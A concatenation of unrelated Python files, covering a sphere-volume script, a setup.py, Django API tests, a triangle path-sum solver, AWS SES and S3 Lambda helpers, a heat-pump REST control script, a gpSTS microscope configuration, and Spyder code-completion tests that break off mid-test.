#V = 4.pi.r**3/3
import math
radius = 5
#usando a formula para calcular o volume
volume_sphere = 4 * math.pi * (math.pow(radius,3))/3
print('The volume is {:.2f}.'.format(volume_sphere))
|
from io import open
from setuptools import find_packages, setup
with open('requirements.txt') as fp:
install_requires = fp.read()
setup(
name='modstool',
author='Mike Gerber, The QURATOR SPK Team',
author_email='mike.gerber@sbb.spk-berlin.de, qurator@sbb.spk-berlin.de',
description='Convert MODS metadata to a pandas DataFrame',
long_description=open('README.md', 'r', encoding='utf-8').read(),
long_description_content_type='text/markdown',
keywords='qurator mets mods library',
license='Apache',
namespace_packages=['qurator'],
packages=find_packages(exclude=['*.tests', '*.tests.*', 'tests.*', 'tests']),
install_requires=install_requires,
entry_points={
'console_scripts': [
'modstool=qurator.modstool.modstool:main',
]
},
python_requires='>=3.0.0',
tests_require=['pytest'],
)
|
from datetime import timedelta
import pytest
from django.urls import reverse
from django.utils.timezone import localtime
@pytest.mark.django_db
def test_rest_api_autor_detail(client, autor):
res = client.get(reverse("api_v1:autor-detail", args=(autor.pk,)))
assert res.status_code == 200
@pytest.mark.django_db
def test_rest_api_autor_list(client, autor):
res = client.get(reverse("api_v1:autor-list"))
assert res.status_code == 200
@pytest.mark.django_db
def test_rest_api_autor_filtering_1(api_client, autor):
czas = localtime(autor.ostatnio_zmieniony).strftime("%Y-%m-%d %H:%M:%S")
res = api_client.get(
reverse("api_v1:autor-list") + f"?ostatnio_zmieniony_after={czas}"
)
assert res.json()["count"] == 1
@pytest.mark.django_db
def test_rest_api_autor_filtering_2(api_client, autor):
czas = localtime(autor.ostatnio_zmieniony + timedelta(seconds=1)).strftime(
"%Y-%m-%d %H:%M:%S"
)
res = api_client.get(
reverse("api_v1:autor-list") + f"?ostatnio_zmieniony_after={czas}"
)
assert res.json()["count"] == 0
|
sss = '''75
95 64
17 47 82
18 35 87 10
20 04 82 47 65
19 01 23 75 03 34
88 02 77 73 07 63 67
99 65 04 28 06 16 70 92
41 41 26 56 83 40 80 70 33
41 48 72 33 47 32 37 16 94 29
53 71 44 65 25 43 91 52 97 51 14
70 11 33 28 77 73 17 78 39 68 17 57
91 71 52 38 17 14 91 43 58 50 27 29 48
63 66 04 68 89 53 67 30 73 16 69 87 40 31
04 62 98 27 23 09 70 98 73 93 38 53 60 04 23'''
a = []
lines = sss.split('\n')
for line in lines:
b = []
nums = line.split(' ')
for num in nums:
b.append(int(num))
a.append(b)
n = 15
dp = []
dp.append([a[0][0]])
for i in range(1, n):
line = []
for j in range(0, i+1):
t = 0
if j > 0:
t = max(t, dp[i-1][j-1])
if j < i:
t = max(t, dp[i-1][j])
t += a[i][j]
line.append(t)
dp.append(line)
ans = 0
for i in range(0, n):
ans = max(ans, dp[n-1][i])
print ans
|
from app.main import app
|
import boto3
import os
import logging
ses = boto3.client('ses', region_name=os.environ.get('AWS_REGION'))
logger = logging.getLogger('ses-mailer')
logger.setLevel(logging.INFO)
def send_email(email, userName, mailFrom, mailBody):
logger.info('Sending mail to {} ({}) via AWS SES'.format(userName, email))
ses.send_email(
Source='{}'.format(mailFrom),
Destination={
'ToAddresses': [
email
]
},
Message={
'Subject': {
'Data': 'New Access Key Pair'
},
'Body': {
'Html': {
'Data': mailBody,
'Charset': 'UTF-8'
}
}
}
)
logger.info('Mail sent to {} ({}) via AWS SES'.format(userName, email))
|
"""
MIT License
Copyright (c) 2020 - 2022 Andreas Merkle <web@blue-andi.de>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
================================================================================
"""
import sys
import requests
HEATPUMP_URL = 'http://heatpump.fritz.box'
char_map = {
0xfffd: '?' # Map unknown UTF-8 character to '?'
}
ROOT_MENU_ROW_4 = 'W?rme Info Men?'
BACK_BUTTON_ROW_4 = 'Zur?ck'
CANCEL_BUTTON_ROW_4 = 'Abbr.'
action_list = [{
'row': 4,
'expected': 'W?rme Info Men?',
'action': 'buttonR'
}, {
'row': 2,
'expected': 'Hausw?rme',
'action': 'wheelTR'
}, {
'row': 2,
'expected': 'Warmwassereinst.',
'action': 'buttonR'
}, {
'row': 3,
'expected': 'Extra Warmwasser',
'action': 'buttonR'
}, {
'row': 1,
'expected': ' Extra Warmwasser',
'action': 'buttonR'
}, {
'row': 1,
'expected': ' Extra Warmwasser',
'action': 'wheelTR'
}, {
'row': 4,
'expected': 'Abbr. Speichern',
'action': 'buttonR'
}]
def get_display_content(base_uri, row):
"""Get display row content.
Args:
base_uri (str): The base URI of the server.
row (int): Row number [1; 4]
Returns:
str: The row content as string.
"""
row_min = 1
row_max = 4
content = ''
if row_min <= row <= row_max:
dst_url = base_uri + '/api/display/' + str(row)
response = requests.get(dst_url, headers={"Content-Type": "application/json"})
if response.status_code == 200:
# The response may contain control characters, therefore disable strict parsing.
json_doc = response.json(strict=False)
# The response may contain non UTF-8 conform characters, replace them via '?'.
content = json_doc['data']['display'].translate(char_map)
return content
def show_display(base_uri):
"""Show the whole display content on the console.
Args:
base_uri (str): The base URI of the server.
"""
row_min = 1
row_max = 4
print("--------------------")
for row in range(row_min, (row_max + 1)):
print(get_display_content(base_uri, row))
print("--------------------")
def manipulate_keyboard(base_uri, hmi_device):
"""Manipulate the HMI interface of the heatpump.
Args:
base_uri (str): The base URI of the server.
hmi_device (str): The HMI specific name, see REST API.
Returns:
boolean: If successful it will return True otherwise False.
"""
is_successful = False
dst_url = base_uri + '/api/frontPanel/' + hmi_device
response = requests.post(dst_url, headers={"Content-Type": "application/json"})
if response.status_code == 200:
is_successful = True
return is_successful
def press_left_button(base_uri):
"""Press the left button of the HMI.
Args:
base_uri (str): The base URI of the server.
Returns:
boolean: If successful it will return True otherwise False.
"""
return manipulate_keyboard(base_uri, 'buttonL')
def press_right_button(base_uri):
"""Press the right button of the HMI.
Args:
base_uri (str): The base URI of the server.
Returns:
boolean: If successful it will return True otherwise False.
"""
return manipulate_keyboard(base_uri, 'buttonR')
def turn_wheel_left(base_uri):
"""Turn the wheel left of the HMI.
Args:
base_uri (str): The base URI of the server.
Returns:
boolean: If successful it will return True otherwise False.
"""
return manipulate_keyboard(base_uri, 'wheelTL')
def turn_wheel_right(base_uri):
"""Turn the wheel right of the HMI.
Args:
base_uri (str): The base URI of the server.
Returns:
boolean: If successful it will return True otherwise False.
"""
return manipulate_keyboard(base_uri, 'wheelTR')
if __name__ == '__main__':
RET_VAL = 0 # Success
# The menu shall be in the root menu
row_4 = get_display_content(HEATPUMP_URL, 4)
while row_4 != ROOT_MENU_ROW_4:
if row_4.startswith(BACK_BUTTON_ROW_4) or row_4.startswith(CANCEL_BUTTON_ROW_4):
if press_left_button(HEATPUMP_URL) is False:
RET_VAL = 1 # Error
break
else:
row_4 = get_display_content(HEATPUMP_URL, 4)
else:
RET_VAL = 2 # Error
break
if RET_VAL == 0:
# Execute the actions in the action list to trigger
# extra warm water.
for action in action_list:
# Get expected string on the display from the specified row.
# This will be used to check whether we are in the correct menu
# and to avoid configuring something bad.
row_content = get_display_content(HEATPUMP_URL, action['row'])
# Does the expected string on the display not match?
if row_content.startswith(action['expected']) is False:
show_display(HEATPUMP_URL)
print('Expected: "' + action['expected'] + '"')
RET_VAL = 3 # Error
break
else:
# We are in the correct menu, execute action on HMI.
if manipulate_keyboard(HEATPUMP_URL, action['action']) is False:
print('Invalid action.')
RET_VAL = 4 # Error
break
#show_display(HEATPUMP_URL)
sys.exit(RET_VAL)
|
import json
import base64
import boto3
import os
import uuid
import botocore
import imghdr
s3 = boto3.client('s3')
dynamodb = boto3.client('dynamodb')
def upload_metadata(key, userid):
table = os.environ['table']
bucket = os.environ['bucket']
reference = {'Bucket': {'S': bucket}, 'Key': {'S': key}}
response = dynamodb.put_item(
TableName=table,
Item={"userid": {
'S': userid}, "photo_reference": {'M': reference}})
print(response)
def upload_image(image_id, img, userid):
bucket = os.environ['bucket']
extension = imghdr.what(None, h=img)
key = f"{image_id}.{extension}"
try:
s3.put_object(Bucket=bucket, Key=key, Body=img)
upload_metadata(key, userid)
except botocore.exceptions.ClientError as e:
print(e)
return False
return True
def handler(event, context):
print(event)
# Generate random image id
image_id = str(uuid.uuid4())
data = json.loads(event['body'])
userid = data['userid']
img = base64.b64decode(data['photo'])
if upload_image(image_id, img, userid):
return {
'statusCode': 200,
'headers': {
'Access-Control-Allow-Headers': '*',
'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Methods': 'OPTIONS,POST,GET'
},
'body': json.dumps('Success!')
}
return {
'statusCode': 500,
'headers': {
'Access-Control-Allow-Headers': '*',
'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Methods': 'OPTIONS,POST,GET'
},
'body': json.dumps('Request Failed!')
}
|
# -*- coding: utf-8 -*-
#
# John C. Thomas 2021 gpSTS
###########################################
###Configuration File######################
###for gpSTS steering of experiments######
###########################################
import os
import numpy as np
from gpsts.NanonisInterface.nanonis_interface import Nanonis
from gpsts.NanonisInterface.data_class import ScanData, SpecCounter, PointList, ImageInfo
from gpsts.NanonisInterface.kernel import kernel_l2
import json
###############################
###Initialize##################
###############################
nanonis_config = {
"Nanonis_Settings": {
"File": "gpSTSinit",
"ExperimentName": "Test Out",
"Version": "0.0.1",
"ImageStart": "test_img001.sxm",
"FolderLocation": "C:\\gpSTS\\src\\",
"DataLocation": "C:\\gpSTS\\src\\data\\",
"Channel": "Z",
"ImDirection": "forward",
"SpectralRange": [-1,1],
"NumSpectralPoints": 1200,
"Center_Point": [174,34],
"Search_Window": 40,
"Feature_Window": 20,
"ScanCurrent": 30e-12,
"SpecCurrent": 200e-12,
"STSbias": "Bias calc (V)",
"STSsignal": "Current (A)"
},
"Neural_Network": {
"TrainingPath": "C:\\gpSTS\\src\\train\\",
"EpochNumber": 2,
"ClassNumber": 4,
"LearningRate": 0.001,
"BatchSizeTrain": 5,
"BatchSizeVal": 1,
"BatchSizeTest": 1
}
}
with open('data/'+str(nanonis_config['Nanonis_Settings']['File'])+'.json','w') as fil:
json.dump(nanonis_config, fil, sort_keys = True, indent = 4, ensure_ascii = False)
Vals = ScanData()
Vals.update_file_info(nanonis_config['Nanonis_Settings']['FolderLocation'],
nanonis_config['Nanonis_Settings']['ImageStart'], nanonis_config['Nanonis_Settings']['Channel'],
nanonis_config['Nanonis_Settings']['ImDirection'])
Vals.update_search_conditions(nanonis_config['Nanonis_Settings']['Center_Point'],
nanonis_config['Nanonis_Settings']['Search_Window'],nanonis_config['Nanonis_Settings']['Feature_Window'],
nanonis_config['Nanonis_Settings']['SpectralRange'])
fil_path, imfile, channel, imdirection = Vals.get_file_info()
try:
imoff, impix, imsize = Nanonis.readheader(fil_path+'data'+'\\',imfile)
except Exception as e:
print('Error. Please save '+str(imfile)+' within '+str(fil_path)+'data\\')
raise e
Vals.update_scan_conditions(imoff, impix, imsize)
imdirectory = fil_path+'data'+'\\'+'impath'
if not os.path.exists(imdirectory):
os.makedirs(imdirectory)
datadirectory = fil_path+'data'
if not os.path.exists(datadirectory):
os.makedirs(datadirectory)
def return_scandata():
return Vals
spec_counter = SpecCounter()
spec_counter.update_maxcnt(10)
def return_cnt():
return spec_counter
recorded_points = PointList()
def return_pntlist():
return recorded_points
imout = Nanonis.readimage(fil_path+'data'+'\\'+imfile,channel,imdirection)
current_image = ImageInfo(imout)
def return_image():
return current_image
Nanonis.sxm_plot(imout,imdirectory,'current',recorded_points.get_list())
center_point, search_window, feature_window, spec_range = Vals.get_search_conditions()
imx1, imx2 = int((center_point[0]-(feature_window/2))), int((center_point[0]+(feature_window/2)))
imy1, imy2 = int((center_point[1]-(feature_window/2))), int((center_point[1]+(feature_window/2)))
imtrack = imout[imx1:imx2,imy1:imy2]
Nanonis.sxm_plot(imtrack,imdirectory,'feature',recorded_points.get_list())
###############################
###General#####################
###############################
from controls import perform_NanonisExp_BiasSpec, perform_experiment_overlap2
from gpsts.NanonisInterface.graph import plot_2d_function
parameters = {
"x1": {
"element interval": [1,int(impix[0][0])],
},
"x2": {
"element interval": [1,int(impix[0][0])],
},
}
###acquisition functions###
def my_ac_func(x,obj):
mean = obj.posterior_mean(x)["f(x)"]
cov = obj.posterior_covariance(x)["v(x)"]
sig = obj.shannon_information_gain(x)["sig"]
ucb = mean + 3.0 * np.sqrt(cov)
return cov
gaussian_processes = {
"model_1": {
"kernel function": kernel_l2,
"hyperparameters": [1.0,1.0,1.0],
"hyperparameter bounds": [[1.0,100.0],[0.10,100.0],[0.10,100.0]],
"input hyper parameters": [1.0,1.0,1.0],
"output hyper parameters": [1.0],
"input hyper parameter bounds": [[0.01,1000000.0],[0.01,10.0],[0.01,10.0]],
"output hyper parameter bounds":[[0.9,1.1]],
"number of returns": 1,
"dimensionality of return": 1,
"variance optimization tolerance": 0.001,
"adjust optimization threshold": [True,0.1],
"steering mode": "covariance",
"run function in every iteration": None,
"data acquisition function": perform_NanonisExp_BiasSpec,
"acquisition function": my_ac_func,
"objective function": None,
"mean function": None,
"cost function": None,
"cost update function": None,
"cost function parameters": {"offset": 10,"slope":2.0},
"cost function optimization bounds": [[0.0,10.0],[0.0,10.0]],
"cost optimization chance" : 0.1,
"plot function": plot_2d_function,
"acquisition function optimization tolerance": 0.001
},
}
compute_device = "cpu"
sparse = False
compute_inverse = False
initial_likelihood_optimization_method = "global"
training_dask_client = False
prediction_dask_client = False
likelihood_optimization_tolerance = 1e-12
likelihood_optimization_max_iter = 200
automatic_signal_variance_range_determination = True
acquisition_function_optimization_method = "global"
chance_for_local_acquisition_function_optimization = 0.5
acquisition_function_optimization_population_size = 20
acquisition_function_optimization_max_iter = 20
global_likelihood_optimization_at = [200]
hgdl_likelihood_optimization_at = []
local_likelihood_optimization_at = []
breaking_error = 1e-18
########################################
###Variance Optimization################
########################################
objective_function_optimization_population_size = 20
likelihood_optimization_population_size = 20
number_of_suggested_measurements = 1
########################################
###Computation Parameters###############
########################################
global_kernel_optimization_frequency = 0.2
local_kernel_optimization_frequency = 0.5
gpu_acceleration = False
rank_n_update = [False,0.2]
gp_system_solver = "inv" # "inv", "cg" or "minres"
switch_system_solver_to_after = [True, "cg", 5000]
###############################
###DATA ACQUISITION############
###############################
initial_data_set_size = 1
max_number_of_measurements = 10
#####################################################################
###############END###################################################
#####################################################################
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
#
"""Tests for code completion."""
# Standard library imports
import os
import os.path as osp
import random
import textwrap
import sys
# Third party imports
from flaky import flaky
import pytest
import pytestqt
from qtpy.QtCore import Qt
from qtpy.QtGui import QTextCursor
try:
from rtree import index
rtree_available = True
except Exception:
rtree_available = False
# Local imports
from spyder.plugins.completion.manager.api import (
LSPRequestTypes, CompletionItemKind)
from spyder.plugins.completion.kite.providers.document import KITE_COMPLETION
from spyder.plugins.completion.kite.utils.status import (
check_if_kite_installed, check_if_kite_running)
from spyder.py3compat import PY2
from spyder.config.manager import CONF
# Location of this file
LOCATION = osp.realpath(osp.join(os.getcwd(), osp.dirname(__file__)))
def set_executable_config_helper(executable=None):
if executable is None:
CONF.set('main_interpreter', 'default', True)
CONF.set('main_interpreter', 'custom', False)
CONF.set('main_interpreter', 'custom_interpreter', sys.executable)
CONF.set('main_interpreter', 'custom_interpreters_list',
[sys.executable])
CONF.set('main_interpreter', 'executable', sys.executable)
else:
CONF.set('main_interpreter', 'default', False)
CONF.set('main_interpreter', 'custom', True)
CONF.set('main_interpreter', 'custom_interpreter', executable)
CONF.set('main_interpreter', 'custom_interpreters_list', [executable])
CONF.set('main_interpreter', 'executable', executable)
@pytest.mark.slow
@pytest.mark.first
def test_space_completion(lsp_codeeditor, qtbot):
"""Validate completion's space character handling."""
code_editor, _ = lsp_codeeditor
code_editor.toggle_automatic_completions(False)
code_editor.toggle_code_snippets(False)
CONF.set('editor', 'completions_wait_for_ms', 0)
completion = code_editor.completion_widget
# Set cursor to start
code_editor.go_to_line(1)
# Complete from numpy --> from numpy import
qtbot.keyClicks(code_editor, 'from numpy ')
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_change()
# press tab and get completions
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyPress(code_editor, Qt.Key_Tab)
assert "import" in [x['label'] for x in sig.args[0]]
assert code_editor.toPlainText() == 'from numpy import'
assert not completion.isVisible()
code_editor.toggle_automatic_completions(True)
code_editor.toggle_code_snippets(True)
@pytest.mark.slow
@pytest.mark.first
@flaky(max_runs=5)
@pytest.mark.skipif(bool(os.environ.get('CI', None)), reason='Fails on CI!')
def test_hide_widget_completion(lsp_codeeditor, qtbot):
"""Validate hiding completion widget after a delimeter or operator."""
code_editor, _ = lsp_codeeditor
completion = code_editor.completion_widget
delimiters = ['(', ')', '[', ']', '{', '}', ',', ':', ';', '@', '=', '->',
'+=', '-=', '*=', '/=', '//=', '%=', '@=', '&=', '|=', '^=',
'>>=', '<<=', '**=']
code_editor.toggle_automatic_completions(False)
code_editor.toggle_code_snippets(False)
# Set cursor to start
code_editor.set_text('')
code_editor.completion_widget.hide()
code_editor.go_to_line(1)
# Complete from numpy import --> from numpy import ?
qtbot.keyClicks(code_editor, 'from numpy import ')
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_change()
# Press tab and get completions
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000):
qtbot.keyPress(code_editor, Qt.Key_Tab)
# Check the completion widget is visible
assert completion.isHidden() is False
# Write a random delimeter on the code editor
delimiter = random.choice(delimiters)
print(delimiter)
qtbot.keyClicks(code_editor, delimiter)
qtbot.wait(1000)
# Check the completion widget is not visible
assert completion.isHidden() is True
code_editor.toggle_automatic_completions(True)
code_editor.toggle_code_snippets(True)
@pytest.mark.slow
@pytest.mark.first
@flaky(max_runs=5)
@pytest.mark.skipif(
os.environ.get('CI') and (PY2 and os.name != 'nt'),
reason='Fails on CI with Mac/Linux and Python 2')
def test_automatic_completions(lsp_codeeditor, qtbot):
"""Test on-the-fly completions."""
code_editor, _ = lsp_codeeditor
completion = code_editor.completion_widget
code_editor.toggle_code_snippets(False)
# Set cursor to start
code_editor.go_to_line(1)
# Complete f -> from
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyClicks(code_editor, 'f')
assert "from" in [x['label'] for x in sig.args[0]]
# qtbot.keyPress(code_editor, Qt.Key_Tab)
qtbot.keyClicks(code_editor, 'rom')
# Due to automatic completion, the completion widget may appear before
stop = False
while not stop:
try:
with qtbot.waitSignal(completion.sig_show_completions,
timeout=5000) as sig:
pass
code_editor.completion_widget.hide()
except Exception:
stop = True
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyClicks(code_editor, ' n')
assert "ntpath" in [x['label'] for x in sig.args[0]]
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyClicks(code_editor, 'ump')
assert "numpy" in [x['label'] for x in sig.args[0]]
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyClicks(code_editor, 'y')
# Due to automatic completion, the completion widget may appear before
stop = False
while not stop:
try:
with qtbot.waitSignal(completion.sig_show_completions,
timeout=5000) as sig:
pass
code_editor.completion_widget.hide()
except Exception:
stop = True
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyClicks(code_editor, ' imp')
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyPress(code_editor, Qt.Key_Tab)
assert code_editor.toPlainText() == 'from numpy import'
# Due to automatic completion, the completion widget may appear before
stop = False
while not stop:
try:
with qtbot.waitSignal(completion.sig_show_completions,
timeout=5000) as sig:
pass
code_editor.completion_widget.hide()
except Exception:
stop = True
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyClicks(code_editor, ' r')
assert "random" in [x['label'] for x in sig.args[0]]
code_editor.toggle_code_snippets(True)
@pytest.mark.slow
@pytest.mark.first
@flaky(max_runs=5)
def test_automatic_completions_tab_bug(lsp_codeeditor, qtbot):
"""
Test on-the-fly completions.
Autocompletions should not be invoked when Tab/Backtab is pressed.
See: spyder-ide/spyder#11625
"""
code_editor, _ = lsp_codeeditor
completion = code_editor.completion_widget
code_editor.toggle_code_snippets(False)
code_editor.set_text('x = 1')
code_editor.set_cursor_position('sol')
try:
with qtbot.waitSignal(completion.sig_show_completions,
timeout=5000):
qtbot.keyPress(code_editor, Qt.Key_Tab)
assert False
except pytestqt.exceptions.TimeoutError:
pass
try:
with qtbot.waitSignal(completion.sig_show_completions,
timeout=5000):
qtbot.keyPress(code_editor, Qt.Key_Backtab)
assert False
except pytestqt.exceptions.TimeoutError:
pass
@pytest.mark.slow
@pytest.mark.first
@flaky(max_runs=5)
def test_automatic_completions_space_bug(lsp_codeeditor, qtbot):
"""Test that completions are not invoked when pressing the space key."""
code_editor, _ = lsp_codeeditor
completion = code_editor.completion_widget
code_editor.toggle_code_snippets(False)
code_editor.set_text('x = 1')
code_editor.set_cursor_position('sol')
qtbot.keyPress(code_editor, Qt.Key_Right)
try:
with qtbot.waitSignal(completion.sig_show_completions,
timeout=5000):
qtbot.keyPress(code_editor, Qt.Key_Space)
assert False
except pytestqt.exceptions.TimeoutError:
pass
@pytest.mark.slow
@flaky(max_runs=3)
def test_automatic_completions_parens_bug(lsp_codeeditor, qtbot):
"""
Test on-the-fly completions.
Autocompletions for variables don't work inside function calls.
Note: Don't mark this as first because it fails on Windows.
See: spyder-ide/spyder#10448
"""
code_editor, _ = lsp_codeeditor
completion = code_editor.completion_widget
code_editor.toggle_code_snippets(False)
# Parens:
# Set cursor to start
code_editor.set_text('my_list = [1, 2, 3]\nlist_copy = list((my))')
cursor = code_editor.textCursor()
code_editor.moveCursor(cursor.End)
# Move cursor next to list((my$))
qtbot.keyPress(code_editor, Qt.Key_Left)
qtbot.keyPress(code_editor, Qt.Key_Left)
qtbot.wait(500)
# Complete my_ -> my_list
with qtbot.waitSignal(completion.sig_show_completions,
timeout=5000) as sig:
qtbot.keyClicks(code_editor, '_')
assert "my_list" in [x['label'] for x in sig.args[0]]
# Square braces:
# Set cursor to start
code_editor.set_text('my_dic = {1: 1, 2: 2}\nonesee = 1\none = my_dic[on]')
cursor = code_editor.textCursor()
code_editor.moveCursor(cursor.End)
# Move cursor next to my_dic[on$]
qtbot.keyPress(code_editor, Qt.Key_Left)
qtbot.wait(500)
# Complete one -> onesee
with qtbot.waitSignal(completion.sig_show_completions,
timeout=5000) as sig:
qtbot.keyClicks(code_editor, 'e')
assert "onesee" in [x['label'] for x in sig.args[0]]
# Curly braces:
# Set cursor to start
code_editor.set_text('my_dic = {1: 1, 2: 2}\nonesee = 1\none = {on}')
cursor = code_editor.textCursor()
code_editor.moveCursor(cursor.End)
# Move cursor next to {on*}
qtbot.keyPress(code_editor, Qt.Key_Left)
qtbot.wait(500)
# Complete one -> onesee
with qtbot.waitSignal(completion.sig_show_completions,
timeout=5000) as sig:
qtbot.keyClicks(code_editor, 'e')
assert "onesee" in [x['label'] for x in sig.args[0]]
@pytest.mark.slow
@pytest.mark.first
@flaky(max_runs=5)
def test_completions(lsp_codeeditor, qtbot):
"""Exercise code completion in several ways."""
code_editor, _ = lsp_codeeditor
completion = code_editor.completion_widget
code_editor.toggle_automatic_completions(False)
code_editor.toggle_code_snippets(False)
# Set cursor to start
code_editor.go_to_line(1)
# Complete dunder imports from _ --> import _foo/_foom
qtbot.keyClicks(code_editor, 'from _')
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_change()
# press tab and get completions
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyPress(code_editor, Qt.Key_Tab)
assert "__future__" in [x['label'] for x in sig.args[0]]
code_editor.set_text('') # Delete line
code_editor.go_to_line(1)
# Complete underscore variables
qtbot.keyClicks(code_editor, '_foo = 1;_foom = 2;_fo')
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_change()
# press tab and get completions
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyPress(code_editor, Qt.Key_Tab)
completions = [x['label'] for x in sig.args[0]]
assert "_foo" in completions
assert "_foom" in completions
code_editor.set_text('') # Delete line
code_editor.go_to_line(1)
# Complete import mat--> import math
qtbot.keyClicks(code_editor, 'import mat')
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_change()
# press tab and get completions
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyPress(code_editor, Qt.Key_Tab)
assert "math" in [x['label'] for x in sig.args[0]]
# enter should accept first completion
qtbot.keyPress(completion, Qt.Key_Enter, delay=300)
assert code_editor.toPlainText() == 'import math'
# enter for new line
qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
# Complete math.h() -> math.hypot()
qtbot.keyClicks(code_editor, 'math.h')
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_change()
# qtbot.wait(30000)
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyPress(code_editor, Qt.Key_Tab)
if PY2:
assert "hypot(x, y)" in [x['label'] for x in sig.args[0]]
else:
assert [x['label'] for x in sig.args[0]][0] in ["hypot(x, y)",
"hypot(*coordinates)"]
assert code_editor.toPlainText() == 'import math\nmath.hypot'
qtbot.keyPress(code_editor, Qt.Key_Escape)
try:
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyPress(code_editor, Qt.Key_Tab)
except pytestqt.exceptions.TimeoutError:
# This should generate a timeout error because the completion
# prefix is the same that the completions returned by Jedi.
# This is a regression test for spyder-ide/spyder#11600
pass
# enter for new line
qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
# Complete math.h() -> math.degrees()
qtbot.keyClicks(code_editor, 'math.h(')
qtbot.keyPress(code_editor, Qt.Key_Left, delay=300)
qtbot.keyClicks(code_editor, 'y')
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_change()
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyPress(code_editor, Qt.Key_Tab)
if PY2:
assert "hypot(x, y)" in [x['label'] for x in sig.args[0]]
else:
assert [x['label'] for x in sig.args[0]][0] in ["hypot(x, y)",
"hypot(*coordinates)"]
# right for () + enter for new line
qtbot.keyPress(code_editor, Qt.Key_Right, delay=300)
qtbot.keyPress(code_editor, Qt.Key_Right, delay=300)
qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
assert code_editor.toPlainText() == 'import math\nmath.hypot\n'\
'math.hypot()\n'
# Complete math.a <tab> ... s <enter> to math.asin
qtbot.keyClicks(code_editor, 'math.a')
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_change()
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyPress(code_editor, Qt.Key_Tab)
assert "asin(x)" in [x['label'] for x in sig.args[0]]
# Test if the list is updated
assert "acos(x)" == completion.completion_list[0]['label']
qtbot.keyClicks(completion, 's')
data = completion.item(0).data(Qt.UserRole)
assert "asin" == data['insertText']
qtbot.keyPress(completion, Qt.Key_Enter, delay=300)
# enter for new line
qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
assert code_editor.toPlainText() == 'import math\nmath.hypot\n'\
'math.hypot()\nmath.asin\n'
# Check can get list back
qtbot.keyClicks(code_editor, 'math.f')
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_change()
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyPress(code_editor, Qt.Key_Tab)
assert completion.count() == 6
assert "floor(x)" in [x['label'] for x in sig.args[0]]
qtbot.keyClicks(completion, 'l')
assert completion.count() == 1
qtbot.keyPress(completion, Qt.Key_Backspace)
assert completion.count() == 6
# enter for new line
qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
assert code_editor.toPlainText() == 'import math\nmath.hypot\n'\
'math.hypot()\nmath.asin\n'\
'math.f\n'
# Complete math.a <tab> s ...<enter> to math.asin
qtbot.keyClicks(code_editor, 'math.a')
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_change()
with qtbot.waitSignal(completion.sig_show_completions,
timeout=10000) as sig:
qtbot.keyPress(code_editor, Qt.Key_Tab)
qtbot.keyPress(code_editor, 's')
assert "asin(x)" in [x['label'] for x in sig.args[0]]
qtbot.keyPress(completion, Qt.Key_Enter, delay=300)
# enter for new line
qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
assert code_editor.toPlainText() == 'import math\nmath.hypot\n'\
'math.hypot()\nmath.asin\n'\
'math.f\nmath.asin\n'
# Complete math.a|angle <tab> s ...<enter> to math.asin|angle
